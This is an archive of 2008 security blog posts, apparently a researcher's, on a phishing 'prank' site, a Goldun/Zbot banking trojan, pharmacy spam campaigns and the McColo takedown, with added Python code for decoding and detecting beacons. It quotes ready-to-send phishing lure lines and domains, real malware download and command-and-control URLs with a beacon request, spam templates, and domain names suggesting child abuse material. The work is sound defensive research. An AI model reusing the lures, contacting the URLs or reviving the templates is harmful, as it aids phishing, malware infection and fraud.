At the end there is one more link, inviting you to trick your friends by sending an email like this:


Here's how we recommend you trick your friends with this
harmless prank site. We're pretty sure they will send
you a funny reaction!

Send them an email. Try one of these lines...

did u know ur image is displayed on
do u realize ur photo is featured on
has anyone emailed you to let you know ur pic is all over
ur picture is at

Copy/Paste one of these domains to the end of your message.

stolenprofiles.com
swapsecretphotos.com
swapsecretprofiles.com

For example:

do u realize ur photo is featured on stolenprofiles.com

(Note we rotate these suggestions often to avoid messages
being caught in spam filters even though they are not spam.)

Try sending it through regular email with no subject line.
That is most effective.

Try to avoid social sites like MySpace and FaceBook because
they may block your message or even call you a spammer or
a phisher. These sites don't want you to send friends
to external sites like ours. Regular email is best,
ie. Gmail, AOL, etc.

Have fun!


So what do you think? A prank? or an interesting way to harvest people's passwords? I don't know the answer yet, but it certainly struck me as something worth looking into more deeply.

Best theory at the moment . . . users are known to use the same passwords in multiple locations. Could this be a way of trying to harvest email and/or facebook userid and password pairs?


Note: About six hours after posting this, a friend shared with me that Trend Micro had already blogged about this subject. They found a couple of things I didn't see -- including some pop-up messages that I missed because I didn't let the criminal run scripts on my laptop -- and some historical data tying the criminal's email address to a "Captcha" scheme he previously ran. Certainly worth reading if this subject interests you. Click here for TrendMicro Blog coverage of this story.

Sunday, November 16, 2008

Enlisting YOUR BANK to steal your identity

In the past month, we've had three spam campaigns which had one thing in common. They all downloaded files from sergej-grienko.com, and they all "injected" additional questions when you visited your REAL BANK's REAL WEBSITE.

What were the three spam campaigns?

The first was a "You have received an eCard" spam with an ecard.zip attachment. We received around 500 copies of the virus in spam messages between October 1st and October 15th.

The second was a "New anjelina jolie sex scandal" spam with a .zip attachment. We received several versions of this spam - nearly 2,000 copies of the virus - between October 15 and October 27th. The files that we received labeled as "anjelina.zip" on October 15th were very similar to the files we received on October 15th for the ecard.zip.

The third run was "Barak Obama sex scandal" spam with a .zip attachment. These were received on November 10th and 11th, with an attachment named "zeland-01.zip". A similarly configured "new scandal anjelina joly" and "New anjelina jolie sex scandal" was also sent on November 10th, containing an attachment called "ecard.zip", despite the fact that the subject and body suggested something else. zeland-01.zip contained a file called "obama_video.exe".


Oct 1 ecard.exe == 69760de6a852ab59fd18a186a871fc98
Oct 15 e-card.exe == 2521120ff95c2cad5c0b7cd724a0dbb0
Oct 17 Anjelina == 9d40e58d4b91df1fdf7afd3b05dba6d6
Oct 27 anjelina_video.exe == da26039cfcf82b7e8ff659b503cbc9ee
Nov 10 obama_video.exe == bf23b74c51673b6958aa2ffeeca36d1c


The website sergej-grienko.com is in Russia and doesn't run Apache or IIS or any other common webserver. It's running a webserver called "nginx" (pronounced Engine-X). That's a huge negative right there. Many webservers that host malware are using this webserver type.

One of my malware analysis students brought this domain to my attention first on October 31st. He was analyzing the copy of the malware which claimed to be an "anjelina" video which we had received on October 27th. That video made contact with the servers "popokimoki.com", "laureselignac.com", "sergej-grienko.com", and "ulm-haafeulm-haa.com".

The malware downloaded a "substitution" config file for banking sites. This banking configuration file seemed to be the type used by the so-called "Goldun Trojan", which has been around FOREVER -- at least since January 2005 according to Symantec and McAfee.

The Trojan is called a "High Threat" by PCTools:
http://www.pctools.com/mrc/infections/id/Trojan.Goldun/

although Symantec calls it "Risk Level 1: Very Low".

What's the difference in the risk ratings? I believe it's primarily a difference between how hard it is to notice the infection vs. how unwise you would have to be to open a .zip file attached to an email and then execute the program it contains. So, there is a "Very Low" risk that someone is going to receive a .zip attachment promising to be a sex video, unpack the zip file, and then run the attached executable. The malware is VERY widely detected, which means even if you were foolish enough to do that, there is a really great chance that the virus would be detected at execution time.

The problem comes in that if you actually DO get infected, you are quite likely to have a severe impact in the form of identity theft, and because of the root-kit technologies implemented in this virus, you won't know you are infected because the virus hides itself from common commands.

We'll look at some of the network traffic from the October 27th version of the anjelina_video.exe and the November 11th version of the obama_video.exe.

The anjelina video is detected almost uniformly as being "Zbot".

The Obama video is detected by a host of names, including "Haxdoor", "Goldun", and "GoldSpy" -- Haxdoor (eTrust, Ikarus and Microsoft), Goldun (NOD32, Panda, PCTools), and GoldSpy (DrWeb).

However, our experience is that they both contact the same servers and both do mostly the same thing.

When the anjelina_video was executed, it fetched the file:

http://ulm-haafeulm-haa.com/blotch/1010.bin

and made frequent contacts to the site:

http://sergej-grienko.com/e-bolt/data.php

The .bin file sure looked like a Goldun configuration file to me, so we visited Citibank.com, and sure enough, considerable data about where we had just visited, including our OS, browser, screen resolution, and other information, was sent to sergej-grienko.

The commands used a "trackid=" tag to pass an encoded string of information, such as:

GET /e-bolt/data.php?trackid=706172616D3D636D64266C616E673D454E552669643D37343230267368656C6C3D3026736F636B73706F72743D30267665723D392668747470706F72743D3026757074696D656D3D323726757074696D65683D31267569643D5B43363635454438323642364638413346385D HTTP/1.0

which translates to:
param=cmd&lang=ENU&id=7420&shell=0&socksport=0&ver=9&httpport=0&uptimem=27&uptimeh=1&uid=[censored]
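As an added example (not code from the original post), here is a small decoder and log detector for beacons of the shape shown above: it hex-decodes the trackid value, rejects anything that is not a printable query string (so ordinary numeric tracking ids are not flagged), and looks for the bot-status keys. The request and log lines are constructed, and the uid is a placeholder rather than a value from the page.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample beacon in the same shape as the one quoted above:
# the whole query string is hex-encoded into a single "trackid" value.
# The "uid" is a placeholder, not a value from the page.
BEACON_QUERY = (
    "param=cmd&lang=ENU&id=7420&shell=0&socksport=0&ver=9"
    "&httpport=0&uptimem=27&uptimeh=1&uid=[PLACEHOLDER-UID]"
)
SAMPLE_REQUEST = (
    "GET /e-bolt/data.php?trackid="
    + BEACON_QUERY.encode("ascii").hex().upper()
    + " HTTP/1.0"
)

# Constructed proxy-log lines for the detector: one beacon, two benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Oct/2008:14:02:11 -0500] "' + SAMPLE_REQUEST + '" 200 17',
    '10.0.0.7 - - [27/Oct/2008:14:02:15 -0500] "GET /news/index.html HTTP/1.1" 200 5120',
    '10.0.0.9 - - [27/Oct/2008:14:02:20 -0500] "GET /stats.php?trackid=1234 HTTP/1.1" 200 88',
]

TRACKID_RE = re.compile(r"[?&]trackid=([0-9A-Fa-f]+)")
# Keys that a decoded trackid must carry before we call it a bot beacon.
REQUIRED_KEYS = {"param", "id", "uid", "uptimem", "uptimeh"}


def decode_trackid(text):
    """Hex-decode the trackid value found in a request line or log line.

    Returns the decoded parameters as a dict, or None when there is no
    trackid, the value is not even-length hex, or the bytes do not form a
    printable ASCII query string (a plain numeric id decodes to control
    characters and is rejected here).
    """
    match = TRACKID_RE.search(text)
    if match is None:
        return None
    hexstr = match.group(1)
    if len(hexstr) % 2:
        return None
    try:
        decoded = bytes.fromhex(hexstr).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    if not decoded.isprintable() or "=" not in decoded:
        return None
    return dict(parse_qsl(decoded, keep_blank_values=True))


def is_goldun_style_beacon(text):
    """True when the decoded trackid carries the bot-status keys seen above."""
    params = decode_trackid(text)
    return params is not None and REQUIRED_KEYS.issubset(params)


def find_beacons(log_lines):
    """Return (line_number, decoded_params) for every beacon in a log."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        if is_goldun_style_beacon(line):
            hits.append((number, decode_trackid(line)))
    return hits


if __name__ == "__main__":
    for number, params in find_beacons(SAMPLE_LOG):
        print(f"line {number}: {params}")
```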


While the Anjelina malware fetched the data file above, the Obama_video fetched a data file called:

http://sergej-grienko.com/inj/0611nociti.bin

We set up a working theory that the ".bin" file was being named for the date of its creation, European style, so that the "1010.bin" was created October 10th, and the "0611nociti.bin" was created on November 6th. This seemed to be confirmed when on November 11th, the file being downloaded switched to "1111.bin".

What was the purpose of the .bin files?

When visiting websites, the ".bin" file was consulted at each URL to determine whether the URL typed in the browser matched a URL pattern in the configuration file. If there was a match, the webpage was then searched, before displaying to the user, to see whether a particular pattern ON THE FETCHED WEBPAGE was found. If that pattern was found, then additional information was inserted into the webpage.

Using the November 11th configuration file, we took "infected vs. clean" screenshots while visiting 32 different banking login pages that were found in the configuration file. In 28 of the cases, the webpage on the infected computer asked the user to provide additional information while logging on.

All of the information provided (and much more data as well) was stored in a keylog recording file, which was periodically sent to the hacker.
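The "infected vs. clean" comparison described above can be automated at the HTML level rather than by screenshot. The following is an added example, not the author's tooling: it parses the named form fields from a clean and an infected render of the same login page, reports the fields that only appear in the infected copy, and flags those that ask for identity or credential data. Both HTML snippets are constructed and belong to no real bank.

```python
from html.parser import HTMLParser

# Constructed "clean" and "infected" renders of one login page. Neither is a
# real bank's HTML; the injected fields imitate the extra questions described
# above, plus one harmless addition to show that not every injection is flagged.
CLEAN_LOGIN = """
<form action="/login" method="post">
  <label>User ID <input type="text" name="userid"></label>
  <label>Password <input type="password" name="password"></label>
  <input type="submit" value="Sign On">
</form>
"""

INFECTED_LOGIN = """
<form action="/login" method="post">
  <label>User ID <input type="text" name="userid"></label>
  <label>Password <input type="password" name="password"></label>
  <label>ATM PIN <input type="text" name="atm_pin"></label>
  <label>Social Security Number <input type="text" name="ssn"></label>
  <label>Mother's maiden name <input type="text" name="mothers_maiden_name"></label>
  <label><input type="checkbox" name="remember_me"> Remember me</label>
  <input type="submit" value="Sign On">
</form>
"""

# Substrings marking a field as asking for data a login page has no business collecting.
SENSITIVE_HINTS = ("ssn", "social", "pin", "atm", "card", "cvv",
                   "mother", "maiden", "dob", "birth")


class _FieldCollector(HTMLParser):
    """Records (form action, field name, field type) for every named field."""

    def __init__(self):
        super().__init__()
        self.action = ""
        self.fields = set()

    def handle_starttag(self, tag, attrs):
        attr = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.action = attr.get("action", "")
        elif tag in ("input", "select", "textarea"):
            name = attr.get("name", "").strip().lower()
            if name:
                ftype = (attr.get("type") or tag).lower()
                self.fields.add((self.action, name, ftype))

    def handle_endtag(self, tag):
        if tag == "form":
            self.action = ""


def form_fields(html):
    """Set of (action, name, type) tuples for all named fields on a page."""
    parser = _FieldCollector()
    parser.feed(html)
    parser.close()
    return parser.fields


def injected_fields(clean_html, infected_html):
    """Fields present on the infected render but absent from the clean one."""
    return form_fields(infected_html) - form_fields(clean_html)


def suspicious_injections(clean_html, infected_html):
    """Injected fields that look like credential or identity questions."""
    added = injected_fields(clean_html, infected_html)
    return {
        field for field in added
        if field[2] == "password" or any(hint in field[1] for hint in SENSITIVE_HINTS)
    }


if __name__ == "__main__":
    for action, name, ftype in sorted(suspicious_injections(CLEAN_LOGIN, INFECTED_LOGIN)):
        print(f"injected into {action}: {name} ({ftype})")
```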

Here are some example "Before and After" pictures. The banks that were tested included:

(53) Fifth Third Bank
Bangor
Bank of America
Bank of Hawaii
Bank of the West
BB&T
California Bank
Capital One
Citizens Bank
East West Bank
First American Bank
First American Trust
First Bank
First Business
First Citizens
First Merit Bank
First Niagra Bank
Frost Bank
Huntington Bank
M&T Bank
Metro National Bank
National Bank of Arizona
PNC Bank
Regions Bank
TD Bank North
WAMU
Webster Online

Image clean-up and sizing underway. Full images of all are available by request to law enforcement and qualified researchers as part of the full report on this subject.

Saturday, November 15, 2008

Post McColo Spam - What do we see?

On the evening of November 11th, the McColo network was "de-peered" and lost access to the Internet. Since that time, those who have unfiltered spam sources are seeing a dramatic decrease in spam. At the UAB Spam Data Mine, on November 12th, November 13th, and November 14th, we had our three lightest spam days in the past year, with a three day daily average 65% below the previous 30 day daily average.

A shout out here to the guys at FireEye, who helped document why the Srizbi botnet was not able to come back online. Several people have said "I can't believe the criminals didn't have a backup plan coded into their bot!" Well, it turns out they did, as FireEye documented in their entry "100,000 Srizbi IPs detected in 24 hours". It turns out there were four unregistered domain names coded into the bots. When McColo's shutdown became imminent, someone (not sure right now if it was FireEye) registered the domains before the criminal could. As a result, FireEye is able to watch the Srizbi bots ATTEMPT to contact their backup, but since the criminals don't own those domains, the attempt fails, and the bots sit idle, wondering what to do next.

So what are the OTHER spammers doing in the meantime? Let's look at the spam we received on Thursday, November 13th at the UAB Spam Data Mine.


It's still primarily about pills. 56% of our spam falls into 6 spam groups - not sorted by Botnet, but by the "look and feel" of the spam, its email body, its subject lines, or its website hosting.

20% - My Canadian Pharmacy - Subjects = single word greeting
13% - Canadian Pharmacy - Subjects = price and quantity of pills
8% - Canadian Pharmacy - random mis-spelled words in body
6% - Canadian Pharmacy - MSN Featured Offers spam
6% - Penis Enlargement Patch
3% - Canadian Pharmacy - Hall of Shame

In addition to these there were six other Canadian Pharmacy spam groups, all tiny, a new "BigPRX" enlargement spam, and small campaigns for US Drugs and Canadian Health and Care Mall.

I'll share some details about all of them below.

Besides those, our other "large spam campaigns" are:

5% = Russian Chat Girlfriends and wives . . .
4% = call 1-305-390-0269 to get a diploma . . .

While no other spam groups comprised more than 1% of our spam on this day, I also wanted to note our two biggest malware items of the day:

United Postal Service tracking number malware . . .
Fake airline tickets malware . . .




The largest single campaign still spamming is for "MyCanadian Pharmacy". The My Canadian Pharmacy campaign accounted for 20% of all of our spam on November 13th!

The spam messages only contain a URL. No message of any type.

The only domains in this group were:

tubdyqwenqe.com
wudvospewy.com

The subjects are also extremely simple:

Aloha
Ave
Greeting
Hallo
Hello
Hey
Hi
Regards
Salute




There are at least nine distinct spam templates that are sending us Canadian Pharmacy spam.



13% of our spam comes from a Canadian Pharmacy Template H:

This campaign has spam subject lines which combine a pill name, a price, and a quantity of pills, randomly selected, like these:

$99.95 Viagra 100mg x 30 pills buy now
$129.95 Viagra 100mg x 60 pills price
buy now Viagra (Sildenafil) 100mg x 90 pills $159.95
Price for 50mg x 60 pills $2.00 per pill
etc.

The domain names in this group are:


The bodies of the emails follow the same template as the subjects . . . a random dose, quantity and price, followed by a URL, such as:

50mg x 60 pills US $ 2.00 Per Pill
http://coasttwenty.com




8% of our spam comes from Canadian Pharmacy Template A:

In this email template, random words are mis-spelled throughout the email, but the basic message is the same:


If you are tired of ovërpaying for meds, and overpaying for visits to the Doctors -

If you need to get the prescriptiõn. fi|led without hassle and iinconvenience -

Here is your solution : the world's most trusted Ïnternett Önlinee Meds Stôre.

Carrying þopular meds at incredibly low príces, suchh as

- Magic Blue pill (from just $ 1) Via and Cia
- Soma (for your päin relïef) - from just $ 0.60
- Tramadol (for your pãin relief) - justt $ 2
- And thoûsands more differentt meds for all conditions

Recommendêd by Canadiann Health cãrè Professionals and by thousänds of satisfied cùstomers world wide

http://krnnlkb.cn


This template uses the domain names:


and the subject lines:

0nline Discount Pharmacy
A Licensed drug store, best meds online
Advantages of online pharmacies
Affordable Meds
Amazing and cheap online pharm
Best Pharmacy is dedicated to being your best resource for
buy cheap pharm drugs
Cheap Meds from USA
Compare and Save on Generic Meds ! Valium @ $25. Xanax
Convenient, discreet online pharmacy
Discount Internet Pharmacy - FREE Prescriptions Written
Drugs for confidents! Great offers
Find your medication in our internet Pharmacy
Forget the doctor, get meds online
Fw: Meds. Online, Valiu0m, Xana0x, Viagr0 and many more
Fwd: Get All Meds. Any Meds You Want Prescripts Written
Fwd: Order Anti-depressants, weight loss meds
Fwd: special meds for you
Internet Pharmacy - Cheap Prices
Licensed online pharmacy! Best prices
Look for 50% discounts on meds
Looking for Meds? Cheapest Pharm is Here
Meds approved by us approved doctors. Pnterm.in, Va|l|ium
New Internet Pharmacy
Offshore pharmacy, save huge on meds!
Online Pharmacy - Viagra, Xenical & More - Lowest
Online Pharmacy with all your prescription
Order Meds Direct NOW
Pharmacy - No doctor visits
Pharmacy - No prescription required
Save $$$ with our Internet Pharmacy
Save on Generic Meds! Xanax # $35. Valium
This low pricing on meds provided on our site.
Thousands of customers, meds online
Unbelievable Savings on Generic Meds!! Valium @ $25. Xanax
Verified You Ordered Meds
Want your love back?? Check it out
You can order Anti-depressants, weight loss meds,and pain



3% of emails were from Canadian Pharmacy Group B, which uses different emails that look like this:


What's your HALL of SHAME?

The fast way to solve your most embarassing aiments. Humiliating? Yes. Depressive? Yep. What to do? Visit our site for the most effective solution.

Top female problems and how to solve them.

If you ever been suffering from most known male problems and could not find a good soluion, or dont't like with your present results, visit our site to get the most up-to-date information on problems and the ways to treat them.

Make your way here & Save Today! http://www.legacywhen.com


Domains in this group are:

legacywhen.com
progressfast.com

Subjects in this group are:

10 secrets to good family night life.
7 intimate Relationship Problems and How to Solve Them
Dont let your tiny male problem grow into a disaster.
Dont turn your marriage into disaster, use male enhancers.
How to solve your everyday male problems
How to solve your marriage problems with enhancers.
If your wife became cold, light the fire in her again with female enhancers.
If your wife needs your attention, you can help her anytime.
IT is the modern, fastest and safest way to solve all your male problems.
Looking for ways to solve male, financial and family problems?
Secret to young-looking skin.
Solutions For Embarrassing Male Troubles.
Time to move to next level in your enhancing process.
Top males problems and ways to avoid and cure them.
You search for perfect xxxlife is over.



6% of our spam on November 13th was from spam templates which pretended to be an "MSN Featured Offer". There are actually several different spam sending patterns in this group, but each has this text in common:


About this mailing:
You are receiving this e-mail because you subscribed to MSN Featured Offers. Microsoft respects your privacy. If you do not wish to receive this MSN Featured Offers e-mail, please click the "Unsubscribe" link below. This will not unsubscribe you from e-mail communications from third-party advertisers that may appear in MSN Feature Offers. This shall not constitute an offer by MSN. MSN shall not be responsible or liable for the advertisers' content nor any of the goods or service advertised. Prices and item availability subject to change without notice.

©2008 Microsoft | Unsubscribe | More Newsletters | Privacy

Microsoft Corporation, One Microsoft Way, Redmond, WA 98052


Despite a group of "financially oriented" subject lines, most of these spam messages still redirect to Canadian Pharmacy.

More than 60 domain names are used by this group:


Three distinct subject groups are using this pattern, but all currently point to Canadian Pharmacy websites, including the financial group with subjects like:

/Accounts banker!/
/Annual credit/
/Bank report/
/Credit report/
/Economic report/
etc.

A second group of subjects has more than a hundred full sentence subjects, such as:

RE: A completely natural way to give up smoking.
RE: A new source of life power has been discovered!
RE: A pimple?two pimples?three pimples? They do not leave you? Repulse them!
RE: A pimply guy attracts negative attention? don?t be one of them!
RE: A portable mortar for any disease you might catch.
RE: A single pill may bring out the beast in her!
RE: A single pill raises the immunity a dozen times!
RE: Additional help in building body of your dream.
RE: Afraid of epilepsy? Seizures are not thread anymore.
RE: Almost all men after 40 suffer from it
RE: Amoxicillin. A word that scares bacterial infections.
RE: Annoyed by the new car of a friend? Take a debilitant and buy a better car!
RE: Are you afraid of traveling by plane? Try new reliable medicine!
RE: Bare no morning after headaches in the morning.
RE: Be sure to get enough Zinc for your organism work.
RE: Be the boss in the game. Control your ejaculation.
RE: Become a sophisticated perfume shell adore your talent!
RE: Bring your senses to new level using lubrication.
...
RE: You are growing bald? Here is the answer!
RE: You are the one to set up the rules for that game.
RE: You are young and strong but helpless in bed? There is a way out!
RE: You shouldn?t suffer when the remedy is available!
RE: You sweat all the time? Lose some weight!
RE: You would look awesome without those extra kilos!
RE: Youll appreciate the new antibiotic at its true value!
RE: Your doctor prescribed you a medicine but you dont know where to buy it?


While a third group of subjects has two letters, followed by a Doctor's name, such as:

RE: bw.Doctor Nelson
RE: ja.Doctor Otto
RE: kc.Doctor Lyle
RE: kq.Doctor Emory
RE: kv.Doctor Josue
RE: lb.Doctor Darren



The Penis Enlargement Patch spam uses the following subject lines:

Amazing growth in just weeks
Bring her to seventh heaven
Don't settle for less than 9 inches
Easiest way to gain mass
Endorsed by healthcare professionals worldwide
Enlarge, Widen and Strengthen
Explode her mind with pleasure
Gaining inches the easy way
Grow thicker, harder and longer
Make her desire you
Make her moan with pleasure
Make your friends envious
Power up your package
Proven to enlarge and lengthen
Put on inches instantly
Re: Breakthrough formula for men
Re: don't wait to be huge
Re: Rock hard and huge
Re: watch her come over and over again
Sharon loved the results I got from this
The only formula for men that works
The secret to making her come
The truth behind 9 inches
The ultimate male package
What every woman wants from their man

The websites used by Penis Enlargement Patch are:


Like one of the Canadian Pharmacy groups, the email body uses randomly inserted mis-spellings to try to avoid spam filters. Here's an example:

A top team of British scientists and medical dõctors have wórked to deveIop the statee-of-the-art Peñis Enlargemeent Patch delivery system which automatically increases penis sizee up to 3-4 fulll inches.

The patches are the eàsieèst and most effectïve way to inçréase your penis size.

You won't have to take pills, get under the knifee to perform exþensivê and very painful surgêrÿ, use any pumps or other devices.

http://agolate.net/

No one wïlll evér find out that you are using our product.

Just aåpply one patçh on your body and wear it for 3 dayss and you will startt noticing dramatic résults.

MiIlions of men are taking advantage of thiss rèvolutionary new produçt - Don't be Ieft bëhind!

http://agolate.net/

Wednesday, November 12, 2008

Unprecedented Drop in Spam

Would you like to know exactly what time the peering providers for McColo pulled the plug? It's not hard to tell if you watch spam volumes. Brian Krebs, from the Washington Post, has been using his most excellent blog Security Fix to lead a public awareness crusade against some of the dirtiest Internet Landfills on the web. His journalistic efforts led to the breakup of the Russian Business Networks, the closing of InterCage, the ICANN order against EstDomains, and most recently, the closing (at least for now) of McColo.

We know that in the long term such actions might be nothing more than turning on the light -- the roaches scatter, but resume their business somewhere else. The point is to set an example which, if enough people follow after it, will continue to bring inconvenience and expense to the spammers no matter where they resume their operations.

But for the moment, let's celebrate the possibly temporary drop in spam.

This morning at the UAB Spam Data Mine our spam volumes are decreased from normal volumes by between 65% and 70%! What happened? And can we make any generalizations from today's events?

Very little, if any, spam is actually sent from McColo. Why the shutdown of the McColo network had such a profound impact on spam is that the "Command & Control" servers for many of the world's largest spam-sending botnets resided at McColo. This exercise has shown what we have been arguing all along at UAB -- it is important to find out not just what TYPE of spam is being sent, but HOW it is being sent. I have to say I am even more excited than before about identifying the points of control for some of these other spam-sending botnets.



By isolating the McColo network (the proper term is "de-peering"), the Criminal can no longer update the server where the Botnet machines received their commands. If the bots can't find their controller, they complete their current task, and sit idle, testing from time to time to see if they can reach their Command & Control server. Until they can, they won't have any more spam to send.


Let's look at the immediate impact today of the spam-sending roaches who have been inconvenienced by the McColo shutdown.

There are several places that provide real-time or near real-time graphs of the volume of spam they are seeing. Let's look at a few of them.


(click for current MxLogic Threat Level)

MxLogic.com has been showing spam to be between 83.5% and 91.1% of monitored mail volume for the past week. Yesterday between 1:00 and 4:00 spam dropped from 85% of their monitored mail volume to 71.93%. Currently they are seeing spam as being 64.1% of their email traffic, which I believe would be the lowest point for the entire year.


(click for current SpamCop Statistics)

SpamCop.net normally sees as many as 30 or 40 spam messages per second, and looked at more than 14 million spam emails in the past week. Yesterday spam dropped abruptly from 30 messages per second to around 8 messages per second, and currently spam volumes have not yet crossed the 15 message per second mark for the entire day.

Brian Krebs has updated his earlier post with news that he is receiving feedback from all around the globe of people who are seeing less spam today because of the disconnection of McColo.

If you have numbers or charts showing your own spam drop, please share them with me. I'd love to share them with our readers here: gar@cis.uab.edu

Internet Landfill: McColo Corporation

Brian Krebs has turned his sights on another Internet Landfill, this time the McColo Corporation. Today his column is titled: Major Source of Online Scams and Spams Knocked Offline. Later this morning, the Washington Post ran a longer story on the topic, Major Source of Internet Spam Yanked Offline: Web Hosting Firm Shuttered After Connection to Spammers is Exposed. He mentions in the column that he has been researching McColo for several months, and that when he contacted McColo's upstream providers, Global Crossing and Hurricane Electric, something interesting happened.

Hurricane Electric's Benny Ng told Krebs:

"We looked into it a bit, saw the size and scope of the problem you were reporting and said 'Holy cow!' Within the hour we had terminated all of our connections to them."

Although Global Crossing declined to give Krebs a comment, apparently Krebs has once more accomplished what the entire rest of the security world has been unable to do -- removing another Internet Landfill from the world wide web.

I coined the term "Internet Landfill" in a presentation regarding Krebs' earlier amazing work almost single-handedly removing Intercage from the Internet. I explained it by saying:

Every house has a trash can, and every business has a dumpster. There's a little garbage anywhere you look. But when someone buys the land in your neighborhood and decides to make it a garbage dump, or a landfill, usually the citizens in that neighborhood protest. Some places on the Internet, such as Intercage, exist solely to store filth, malware, and crime. Those places should be treated like "Internet Landfills", and their neighbors should rise up and protest their presence in their neighborhood.


In case anyone has a question about what type of organization McColo is, here is a little fact-finding adventure, using the excellent Reverse IP Tools from DomainTools.com, and the ASN information from CIDR-Report.

McColo's Autonomous System Number is AS26780.

At this time, Hurricane Electric is no longer listed as an upstream, but Global Crossing *IS* still showing a listing, connecting AS3549 (GBLX) to AS26780 (MCCOLO).

The Netblocks currently published as being at McColo are:

208.66.192.0/22
208.72.168.0/21

All their other netblocks are strangely missing.

(See: http://www.cidr-report.org/cgi-bin/as-report?as=as26780)

All of McColo's "Business" webpages were on the server 208.66.192.100. That IP resolved McColo.biz, .com, .info, .net, and .org.

None of those domain names are currently resolving.


Moving through their Class C addresses . . .




208.66.193.* previously had four major domains:

proxyspy.biz
audiobookss.com
authorstore.org
gente.ru

None of those domain names are currently resolving.




208.66.194.* previously had 94 domain names. Just choosing from a few . . .

bestincestfamily dot com (registered at ESTDomains)
bestincestmovies dot com (registered at ESTDomains)
cheapincestpics dot com (registered at ESTDomains)
eliteincestsite dot com (registered at ESTDomains)
teenincestpics dot com (registered at ESTDomains)

None of those domain names are currently resolving.




208.66.195.* previously had domain names. Again, just choosing a few...

protect-access dot com (registered at ESTDomains)
downloadcopy dot com (registered at ESTDomains)
pantyhosefiesta dot com
wm-chance dot net

The pantyhose sites have been moved already to "Sago Networks, LLC".
WM-chance has also been moved to Sago (November 12th) but is not yet operational in its new location. It's a Russian-language online lottery site. Some of the other sites in this group show signs of being "in the process" of moving.




208.72.168.* previously had 1,183 domain names. Again, just choosing a few...

Megacaptcha dot biz (registered at EstDomains)
CaptchaToMoney dot biz (registered at EstDomains)
Torrentpump dot com (registered at Directi)
FtvInnocentAngels dot net (registered at EstDomains)
Coastal-health dot com (registered at OnlineNIC, Inc)
Canadianpharmacycorp1 dot com (registered at Xin Net)
Canadianpharmacycorp2 dot com
Canadianpharmacycorp3 dot com
Canadianpharmacycorp4 dot com
(through 10)
Onlinepharmacysolutions-a dot com (registered at Directi)
Onlinepharmacysolutions-b dot com
Onlinepharmacysolutions-c dot com
Onlinepharmacysolutions-d dot com
Rxmania dot com (registered at GoDaddy)
Pay4pills dot com (registered at GoDaddy)
Asc-antispyware dot com (registered at Beijing Innovative)
A-pennystock dot com (registered at GoDaddy)
Incest-rape dot com (registered at GoDaddy)
Little-gays dot com (registered at EstDomains)
Allyoungmovies dot com (registered at EstDomains)
Smallpussy dot name (registered at EstDomains)(*1)
nymphets dot name (registered at EstDomains)
LittleCuties dot name (registered at EstDomains)

*1 - received 19,317 visitors per month according to Compete.com

None of the sites in this group are currently resolving.




208.72.169.* had 118 domains registered.

Angelgirlspic.com
Searchportalsite.com

Emailru.info
Emailrus.info
Mailfreedom4u.net
Mailblogal.info
Quickmailbox.info
Ruslandmail.info

DomainsUAgroups dot com

and some NOTORIOUS nameserver domains, which are said to belong to Leo Kuvayev, such as:

Jioketinjdesapionkderunjsa.com
Kedfinhderionkadesunpas.com
Vertunhandesikolasderun.com

None of the sites in this group are currently resolving.




208.72.170.* has 22 domain names, including:

cinema4free dot com
flashbill dot net
inc-rep dot biz
asapload dot com
theypay dot biz

playpokeronline-casinos dot com
gamble-poker-holdem dot com
texasholdem-vip dot com

None of the sites in this group are currently resolving.




208.72.171.* has only 4 domain names:

br-ladies dot com
ru-ladies dot com
kharkovblacklist dot com
uapeople dot com




208.72.172.* has 132 domain names. Almost all of them have the word "sex" in the domain name. Many of them have been used to fill blog comments and address books with "SEO spam" (Search Engine Optimization spam), such as the domain:

NicoleHDUncut dot com which has over 19,000 websites pointing back to it, mostly in comment spam.

Pornntube dot com
Sexntube dot com
Tubepornporn dot com
Just-sex-2008 dot com
Hot-girl2008 dot com
FtvHeavenFemme dot net
GoGetFreePorn dot com

clsoft dot net <== encryption software, makers of "cl secrets keeper" and "cl private disk"




208.72.175.* has 12 domain names:

dreamsservices dot com
FianceeOnline dot com
Rudreams dot com
Ukrainefiancee dot com
etc.

None of these sites are currently resolving




Is this the end of McColo? Probably not. Like the Intercage fiasco, we will probably see loud and public outcries of discrimination followed by mournful apologies and promises to do better, each accompanied by a short-lived resurrection, which will terminate again as soon as the new providers understand what sort of filth they are accommodating, and how the Neighbors (that's you and me, folks) feel about having this trash on OUR Internet.

Tuesday, November 11, 2008

Microsoft Reveals Malware and Spam Trends

This week Microsoft released "Microsoft Security Intelligence Report 5". Like the previous volumes, this report collects spam and malware information gathered by Microsoft's security-related teams over one half year, in this case January through June 2008. The 150-page report is described as "An in-depth perspective on software vulnerabilities and exploits, malicious code threats, and potentially unwanted software, focusing on the first half of 2008".

The report shows that vulnerability disclosures by software vendors were down in 1H08: 4% less than 2H07 and 19% less than 1H07. However, the percentage of vulnerabilities rated "High" increased by 13%, so that 48% of all new vulnerabilities received a "High" threat rating from the Common Vulnerability Scoring System.

While we worry about vulnerabilities to hacking, one troubling trend is that more "data breaches" occurred due to Stolen Equipment (37.2%) than Hack Attacks (23%). We need to continue to stress proper data classification in all organizations, and then proper data handling based on that data classification.


Browser Vulnerabilities



Vista came out with high marks compared to its predecessor, Windows XP. Microsoft vulnerabilities accounted for 42% of browser exploits on XP computers, including 5 of the top 10 browser exploits, but only 6% of the browser exploits on Vista were related to Microsoft products, and 0 of the top 10.

One very interesting trend revealed by the report is that hackers continue to target particular geographies. Chinese computers were twice as likely as American computers to be a victim of a Browser-based exploit -- in part because of Chinese-market toolbars which contained vulnerabilities, such as the BaoFengStorm vulnerability and the BaiduToolbar vulnerability. Chinese computers accounted for 48% of the browser based exploits, followed by 23% for American computers. Russian, Italian, British, Spanish, French, Turkish, German, and Korean trailed.

This would be an opportunity to stress the importance of timely installation of browser patches. Even though the report was for the first half of 2008, the top exploited browser vulnerabilities from the Microsoft family were:

MS06-014 (MDAC_RDS)
MS06-071 (MSXML_setRequestHeader)
MS06-057 (WebViewFolderIcon)
MS06-067 (DirectAnimation_KeyFrame)
MS06-055 (VML)

The top exploited non-Microsoft vulnerabilities for 1H08 were:

CVE-2007-0015 (Apple_Quicktime_RTSP)
CVE-2008-1309 (RealPlayer_rmoc3260_Console)
CVE-2007-3148 (Yahoo_WebcamViewer_ActiveX)
